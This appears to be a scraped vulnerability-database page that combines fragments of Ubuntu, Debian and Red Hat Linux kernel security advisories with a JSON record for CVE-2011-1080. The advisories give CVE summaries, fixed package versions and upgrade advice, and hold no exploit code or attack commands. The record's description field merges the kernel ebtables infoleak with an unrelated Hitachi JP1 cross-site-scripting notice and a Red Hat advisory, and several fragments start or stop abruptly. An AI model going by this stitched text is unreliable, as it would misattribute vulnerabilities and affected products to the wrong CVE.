The problem can be corrected by updating your system to the following package versions:

Ubuntu 10.04 LTS: linux-image-2.6.38-12-generic 2.6.38-12.51~lucid1 linux-image-2.6.38-12-generic-pae 2.6.38-12.51~lucid1 linux-image-2.6.38-12-server 2.6.38-12.51~lucid1 linux-image-2.6.38-12-virtual 2.6.38-12.51~lucid1

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. If you use linux-restricted-modules, you have to update that package as well to get modules which work with the new kernel version. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: http://www.ubuntu.com/usn/usn-1256-1 CVE-2011-1020, CVE-2011-1078, CVE-2011-1079, CVE-2011-1080, CVE-2011-1093, CVE-2011-1160, CVE-2011-1180, CVE-2011-1478, CVE-2011-1479, CVE-2011-1493, CVE-2011-1573, CVE-2011-1576, CVE-2011-1577, CVE-2011-1581, CVE-2011-1585, CVE-2011-1767, CVE-2011-1768, CVE-2011-1771, CVE-2011-1776, CVE-2011-1833, CVE-2011-2183, CVE-2011-2213, CVE-2011-2479, CVE-2011-2484, CVE-2011-2491, CVE-2011-2492, CVE-2011-2493, CVE-2011-2494, CVE-2011-2495, CVE-2011-2496, CVE-2011-2497, CVE-2011-2517, CVE-2011-2525, CVE-2011-2689, CVE-2011-2695, CVE-2011-2699, CVE-2011-2700, CVE-2011-2723, CVE-2011-2905, CVE-2011-2909,

Package Information: https://launchpad.net/ubuntu/+source/linux-lts-backport-natty/2.6.38-12.51~lucid1

. (CVE-2010-4242)

Brad Spengler discovered that the kernel did not correctly account for userspace memory allocations during exec() calls. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


Debian Security Advisory DSA-2240-1 security@debian.org http://www.debian.org/security/ dann frazier May 24, 2011 http://www.debian.org/security/faq


Package : linux-2.6 Vulnerability : privilege escalation/denial of service/information leak Problem type : local/remote Debian-specific: no CVE Id(s) : CVE-2010-3875 CVE-2011-0695 CVE-2011-0711 CVE-2011-0726 CVE-2011-1016 CVE-2011-1078 CVE-2011-1079 CVE-2011-1080 CVE-2011-1090 CVE-2011-1160 CVE-2011-1163 CVE-2011-1170 CVE-2011-1171 CVE-2011-1172 CVE-2011-1173 CVE-2011-1180 CVE-2011-1182 CVE-2011-1476 CVE-2011-1477 CVE-2011-1478 CVE-2011-1493 CVE-2011-1494 CVE-2011-1495 CVE-2011-1585 CVE-2011-1593 CVE-2011-1598 CVE-2011-1745 CVE-2011-1746 CVE-2011-1748 CVE-2011-1759 CVE-2011-1767 CVE-2011-1770 CVE-2011-1776 CVE-2011-2022 Debian Bug(s) :

Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or privilege escalation. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2010-3875

Vasiliy Kulikov discovered an issue in the Linux implementation of the
Amateur Radio AX.25 Level 2 protocol.

CVE-2011-0695

Jens Kuehnel reported an issue in the InfiniBand stack. Local
users could learn the text location of a process, defeating protections
provided by address space layout randomization (ASLR).

CVE-2011-1016

Marek Olšák discovered an issue in the driver for ATI/AMD Radeon video
chips. Local users could pass arbitrary values to video memory and the
graphics translation table, resulting in denial of service or escalated
privileges. On default Debian installations, this is exploitable only by
members of the 'video' group.

CVE-2011-1080

Vasiliy Kulikov discovered an issue in the Netfilter subsystem.

CVE-2011-1160

Peter Huewe reported an issue in the Linux kernel's support for TPM security
chips.

CVE-2011-1163

Timo Warns reported an issue in the kernel support for Alpha OSF format disk
partitions.

CVE-2011-1170

Vasiliy Kulikov reported an issue in the Netfilter arp table
implementation.

CVE-2011-1171

Vasiliy Kulikov reported an issue in the Netfilter IP table
implementation.

CVE-2011-1172

Vasiliy Kulikov reported an issue in the Netfilter IP6 table
implementation.

CVE-2011-1173

Vasiliy Kulikov reported an issue in the Acorn Econet protocol
implementation.

CVE-2011-1180

Dan Rosenberg reported a buffer overflow in the Information Access Service
of the IrDA protocol, used for Infrared devices.

CVE-2011-1182

Julien Tinnes reported an issue in the rt_sigqueueinfo interface. Local
users can generate signals with falsified source pid and uid information.

CVE-2011-1476

Dan Rosenberg reported issues in the Open Sound System MIDI interface that
allow local users to cause a denial of service. This issue does not affect
official Debian Linux image packages as they no longer provide support for
OSS.  However, custom kernels built from Debians linux-source-2.6.32 may
have enabled this configuration and would therefore be vulnerable.

CVE-2011-1477

Dan Rosenberg reported issues in the Open Sound System driver for cards that
include a Yamaha FM synthesizer chip. This issue does not affect
official Debian Linux image packages as they no longer provide support for
OSS.  However, custom kernels built from Debians linux-source-2.6.32 may
have enabled this configuration and would therefore be vulnerable.

CVE-2011-1478

Ryan Sweat reported an issue in the Generic Receive Offload (GRO) support in
the Linux networking subsystem.

CVE-2011-1493

Dan Rosenburg reported two issues in the Linux implementation of the Amateur
Radio X.25 PLP (Rose) protocol.

CVE-2011-1494

Dan Rosenberg reported an issue in the /dev/mpt2ctl interface provided by
the driver for LSI MPT Fusion SAS 2.0 controllers. On default Debian
installations this is not exploitable as this interface is only accessible
to root.

CVE-2011-1495

Dan Rosenberg reported two additional issues in the /dev/mpt2ctl interface
provided by the driver for LSI MPT Fusion SAS 2.0 controllers. On default Debian installations this is not
exploitable as this interface is only accessible to root.

CVE-2011-1585

Jeff Layton reported an issue in the Common Internet File System (CIFS).

CVE-2011-1598

Dave Jones reported an issue in the Broadcast Manager Controller Area
Network (CAN/BCM) protocol that may allow local users to cause a NULL
pointer dereference, resulting in a denial of service.

CVE-2011-1745

Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian
installations, this is exploitable only by users in the video group.

CVE-2011-1746

Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian installations, this is exploitable
only by users in the video group.

CVE-2011-1748

Oliver Kartkopp reported an issue in the Controller Area Network (CAN) raw
socket implementation which permits ocal users to cause a NULL pointer
dereference, resulting in a denial of service.

CVE-2011-1759

Dan Rosenberg reported an issue in the support for executing "old ABI"
binaries on ARM processors.

CVE-2011-1767

Alexecy Dobriyan reported an issue in the GRE over IP implementation.

CVE-2011-2022

Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian
installations, this is exploitable only by users in the video group.

This update also includes changes queued for the next point release of Debian 6.0, which also fix various non-security issues. These additional changes are described in the package changelog which can be viewed at:

http://packages.debian.org/changelogs/pool/main/l/linux-2.6/linux-2.6_2.6.32-34/changelog

For the stable distribution (squeeze), this problem has been fixed in version 2.6.32-34squeeze1. Updates for issues impacting the oldstable distribution (lenny) will be available soon.

The following matrix lists additional source packages that were rebuilt for compatibility with or to take advantage of this update:

                                         Debian 6.0 (squeeze)
 user-mode-linux                         2.6.32-1um-4+34squeeze1

We recommend that you upgrade your linux-2.6 and user-mode-linux packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)

iQIcBAEBAgAGBQJN3I4aAAoJEBv4PF5U/IZAaa4P/j+l40Mp6naHByZt3jpwNWSA RN/jkkrYnYNDyT7crB+/DOdu84zalYa2KqfffOd/faV9+NSCBayjJ5c+FvVgeTay Il8elfcWP/uK0BXJn2xVb7YAsLpIe0HRlhxe72ZqcT4Yxo1/IBnEpUS56JRd2tlA k7x7dbj+smlzlM4qiXQy1F6LNyDqoGDUKNohQHUoyQ5dGq/gdi3C7EnUs4Nx9vjK RU1HUWLXB4qm7JpoK6o3u6Hpe0ynZm74tYvTi0XhayGXGevaBvIQuEWqhY6gZF1P v6a5gvBQC2pRIQXAVUbAhjoXpuF5jahTgicLdJanDqLfhefQ3qV11Ahvui2lzZuT iKbMVGzO/azPLzskH8YNBq6drFPX2ZqRsxGmrTdzEtLWnJCN6nBBe4kF6C3z5T1A 1ez4/F+OhNl2wnimq3CxiyfXun9WWs6IlULpqsKgJjE4bItg5a8+zTYGjkhQxX+X fPzO1xZCtQK4i+59Ejs5FwIfps0fA0m8c1Z5bnIaj4Q+0X5sJt2kwws8yrQKoOH1 eKGOgRqM70rOnyW/TQtXDGnTC4+vCCv89UjZUpG+sxZtWUxeh8CL2scUyceTeSNC IS2+EgvilN+a3hQlYJH4YNshmQCtJDp7qMTLaXLHM9hoV1L383nbJV4AtrFlcsCO KRI5f0ds95H6TsEoTSmO =gx2x -----END PGP SIGNATURE-----


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201206-0028",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.38.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.38.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.38.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.38.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.38.4"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.38.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.38.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.38.6"
      },
      {
        "model": "jp1/it service level management manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "-09-50"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-50"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-11-02"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-11"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-10-03"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-10"
      },
      {
        "model": "jp1/it service level management-manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-51"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-50-02"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-11-05"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-406"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1080"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38:rc7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38:rc6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38:rc4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2.6.38.8",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38:rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38:rc5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38:rc8:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-1080"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Hitachi",
    "sources": [
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2011-1080",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2011-1080",
            "trust": 1.0,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201206-406",
            "trust": 0.6,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-406"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1080"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The do_replace function in net/bridge/netfilter/ebtables.c in the Linux kernel before 2.6.39 does not ensure that a certain name field ends with a \u0027\\0\u0027 character, which allows local users to obtain potentially sensitive information from kernel stack memory by leveraging the CAP_NET_ADMIN capability to replace a table, and then reading a modprobe command line. Hitachi JP1 products are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. \nThe following products are affected:\nJP1/IT Resource Management - Manager\nJP1/IT Service Level Management - Manager. \n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. Relevant releases/architectures:\n\nRed Hat Enterprise Linux (v. 5 server) - i386, ia64, noarch, ppc, s390x, x86_64\nRed Hat Enterprise Linux Desktop (v. 5 client) - i386, noarch, x86_64\n\n3. (CVE-2011-1093, Important)\n\n* Multiple buffer overflow flaws were found in the Linux kernel\u0027s\nManagement Module Support for Message Passing Technology (MPT) based\ncontrollers. (CVE-2011-1079, Moderate)\n\n* Missing error checking in the way page tables were handled in the Xen\nhypervisor implementation could allow a privileged guest user to cause the\nhost, and the guests, to lock up. (CVE-2011-1166, Moderate)\n\n* A flaw was found in the way the Xen hypervisor implementation checked for\nthe upper boundary when getting a new event channel port. (CVE-2011-1763, Moderate)\n\n* The start_code and end_code values in \"/proc/[pid]/stat\" were not\nprotected. \n(CVE-2011-1078, Low)\n\n* A missing validation of a null-terminated string data structure element\nin the do_replace() function could allow a local user who has the\nCAP_NET_ADMIN capability to cause an information leak. (CVE-2011-1080, Low)\n\n* A buffer overflow flaw in the DEC Alpha OSF partition implementation in\nthe Linux kernel could allow a local attacker to cause an information leak\nby mounting a disk that contains specially-crafted partition tables. \n(CVE-2011-1163, Low)\n\n* Missing validations of null-terminated string data structure elements in\nthe do_replace(), compat_do_replace(), do_ipt_get_ctl(), do_ip6t_get_ctl(),\nand do_arpt_get_ctl() functions could allow a local user who has the\nCAP_NET_ADMIN capability to cause an information leak. (CVE-2011-1170,\nCVE-2011-1171, CVE-2011-1172, Low)\n\n* A heap overflow flaw in the Linux kernel\u0027s EFI GUID Partition Table (GPT)\nimplementation could allow a local attacker to cause a denial of service\nby mounting a disk that contains specially-crafted partition tables. \n(CVE-2011-1577, Low)\n\nRed Hat would like to thank Dan Rosenberg for reporting CVE-2011-1494 and\nCVE-2011-1495; Vasiliy Kulikov for reporting CVE-2011-1079, CVE-2011-1078,\nCVE-2011-1080, CVE-2011-1170, CVE-2011-1171, and CVE-2011-1172; Kees Cook\nfor reporting CVE-2011-0726; and Timo Warns for reporting CVE-2011-1163\nand CVE-2011-1577. \n\nThis update also fixes several bugs. Documentation for these bug fixes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section. \n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues, and fix the bugs noted in the Technical\nNotes. The system must be rebooted for this update to take effect. Solution:\n\nBefore applying this update, make sure all previously-released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Do not\nuse \"rpm -Uvh\" as that will remove the running kernel binaries from\nyour system. You may use \"rpm -e\" to remove old kernels after\ndetermining that the new kernel functions properly on your system. Bugs fixed (http://bugzilla.redhat.com/):\n\n681259 - CVE-2011-1078 kernel: bt sco_conninfo infoleak\n681260 - CVE-2011-1079 kernel: bnep device field missing NULL terminator\n681262 - CVE-2011-1080 kernel: ebtables stack infoleak\n682954 - CVE-2011-1093 kernel: dccp: fix oops on Reset after close\n684569 - CVE-2011-0726 kernel: proc: protect mm start_code/end_code in /proc/pid/stat\n688021 - CVE-2011-1163 kernel: fs/partitions: Corrupted OSF partition table infoleak\n688156 - [5.6][REG]for some uses of \u0027nfsservctl\u0027 system call, the kernel crashes. [rhel-5.6.z]\n688579 - CVE-2011-1166 kernel: xen: x86_64: fix error checking in arch_set_info_guest()\n689321 - CVE-2011-1170 ipv4: netfilter: arp_tables: fix infoleak to userspace\n689327 - CVE-2011-1171 ipv4: netfilter: ip_tables: fix infoleak to userspace\n689345 - CVE-2011-1172 ipv6: netfilter: ip6_tables: fix infoleak to userspace\n689699 - Deadlock between device driver attachment and device removal with a USB device [rhel-5.6.z]\n689700 - [NetApp 5.6 Bug] QLogic 8G FC firmware dumps seen during IO [rhel-5.6.z]\n690134 - Time runs too fast in a VM on processors with \u0026gt; 4GHZ freq [rhel-5.6.z]\n690239 - gfs2: creating large files suddenly slow to a crawl [rhel-5.6.z]\n694021 - CVE-2011-1494 CVE-2011-1495 kernel: drivers/scsi/mpt2sas: prevent heap overflows\n695976 - CVE-2011-1577 kernel: corrupted GUID partition tables can cause kernel oops\n696136 - RHEL 5.6 (kernel -238) causes audio issues [rhel-5.6.z]\n697448 - slab corruption after seeing some nfs-related BUG: warning [rhel-5.6.z]\n699808 - dasd: fix race between open and offline [rhel-5.6.z]\n701240 - CVE-2011-1763 kernel: xen: improper upper boundary check in get_free_port() function\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 5 client):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/kernel-2.6.18-238.12.1.el5.src.rpm\n\ni386:\nkernel-2.6.18-238.12.1.el5.i686.rpm\nkernel-PAE-2.6.18-238.12.1.el5.i686.rpm\nkernel-PAE-debuginfo-2.6.18-238.12.1.el5.i686.rpm\nkernel-PAE-devel-2.6.18-238.12.1.el5.i686.rpm\nkernel-debug-2.6.18-238.12.1.el5.i686.rpm\nkernel-debug-debuginfo-2.6.18-238.12.1.el5.i686.rpm\nkernel-debug-devel-2.6.18-238.12.1.el5.i686.rpm\nkernel-debuginfo-2.6.18-238.12.1.el5.i686.rpm\nkernel-debuginfo-common-2.6.18-238.12.1.el5.i686.rpm\nkernel-devel-2.6.18-238.12.1.el5.i686.rpm\nkernel-headers-2.6.18-238.12.1.el5.i386.rpm\nkernel-xen-2.6.18-238.12.1.el5.i686.rpm\nkernel-xen-debuginfo-2.6.18-238.12.1.el5.i686.rpm\nkernel-xen-devel-2.6.18-238.12.1.el5.i686.rpm\n\nnoarch:\nkernel-doc-2.6.18-238.12.1.el5.noarch.rpm\n\nx86_64:\nkernel-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-debug-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-debug-debuginfo-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-debug-devel-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-debuginfo-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-debuginfo-common-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-devel-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-headers-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-xen-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-xen-debuginfo-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-xen-devel-2.6.18-238.12.1.el5.x86_64.rpm\n\nRed Hat Enterprise Linux (v. 5 server):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/kernel-2.6.18-238.12.1.el5.src.rpm\n\ni386:\nkernel-2.6.18-238.12.1.el5.i686.rpm\nkernel-PAE-2.6.18-238.12.1.el5.i686.rpm\nkernel-PAE-debuginfo-2.6.18-238.12.1.el5.i686.rpm\nkernel-PAE-devel-2.6.18-238.12.1.el5.i686.rpm\nkernel-debug-2.6.18-238.12.1.el5.i686.rpm\nkernel-debug-debuginfo-2.6.18-238.12.1.el5.i686.rpm\nkernel-debug-devel-2.6.18-238.12.1.el5.i686.rpm\nkernel-debuginfo-2.6.18-238.12.1.el5.i686.rpm\nkernel-debuginfo-common-2.6.18-238.12.1.el5.i686.rpm\nkernel-devel-2.6.18-238.12.1.el5.i686.rpm\nkernel-headers-2.6.18-238.12.1.el5.i386.rpm\nkernel-xen-2.6.18-238.12.1.el5.i686.rpm\nkernel-xen-debuginfo-2.6.18-238.12.1.el5.i686.rpm\nkernel-xen-devel-2.6.18-238.12.1.el5.i686.rpm\n\nia64:\nkernel-2.6.18-238.12.1.el5.ia64.rpm\nkernel-debug-2.6.18-238.12.1.el5.ia64.rpm\nkernel-debug-debuginfo-2.6.18-238.12.1.el5.ia64.rpm\nkernel-debug-devel-2.6.18-238.12.1.el5.ia64.rpm\nkernel-debuginfo-2.6.18-238.12.1.el5.ia64.rpm\nkernel-debuginfo-common-2.6.18-238.12.1.el5.ia64.rpm\nkernel-devel-2.6.18-238.12.1.el5.ia64.rpm\nkernel-headers-2.6.18-238.12.1.el5.ia64.rpm\nkernel-xen-2.6.18-238.12.1.el5.ia64.rpm\nkernel-xen-debuginfo-2.6.18-238.12.1.el5.ia64.rpm\nkernel-xen-devel-2.6.18-238.12.1.el5.ia64.rpm\n\nnoarch:\nkernel-doc-2.6.18-238.12.1.el5.noarch.rpm\n\nppc:\nkernel-2.6.18-238.12.1.el5.ppc64.rpm\nkernel-debug-2.6.18-238.12.1.el5.ppc64.rpm\nkernel-debug-debuginfo-2.6.18-238.12.1.el5.ppc64.rpm\nkernel-debug-devel-2.6.18-238.12.1.el5.ppc64.rpm\nkernel-debuginfo-2.6.18-238.12.1.el5.ppc64.rpm\nkernel-debuginfo-common-2.6.18-238.12.1.el5.ppc64.rpm\nkernel-devel-2.6.18-238.12.1.el5.ppc64.rpm\nkernel-headers-2.6.18-238.12.1.el5.ppc.rpm\nkernel-headers-2.6.18-238.12.1.el5.ppc64.rpm\nkernel-kdump-2.6.18-238.12.1.el5.ppc64.rpm\nkernel-kdump-debuginfo-2.6.18-238.12.1.el5.ppc64.rpm\nkernel-kdump-devel-2.6.18-238.12.1.el5.ppc64.rpm\n\ns390x:\nkernel-2.6.18-238.12.1.el5.s390x.rpm\nkernel-debug-2.6.18-238.12.1.el5.s390x.rpm\nkernel-debug-debuginfo-2.6.18-238.12.1.el5.s390x.rpm\nkernel-debug-devel-2.6.18-238.12.1.el5.s390x.rpm\nkernel-debuginfo-2.6.18-238.12.1.el5.s390x.rpm\nkernel-debuginfo-common-2.6.18-238.12.1.el5.s390x.rpm\nkernel-devel-2.6.18-238.12.1.el5.s390x.rpm\nkernel-headers-2.6.18-238.12.1.el5.s390x.rpm\nkernel-kdump-2.6.18-238.12.1.el5.s390x.rpm\nkernel-kdump-debuginfo-2.6.18-238.12.1.el5.s390x.rpm\nkernel-kdump-devel-2.6.18-238.12.1.el5.s390x.rpm\n\nx86_64:\nkernel-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-debug-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-debug-debuginfo-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-debug-devel-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-debuginfo-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-debuginfo-common-2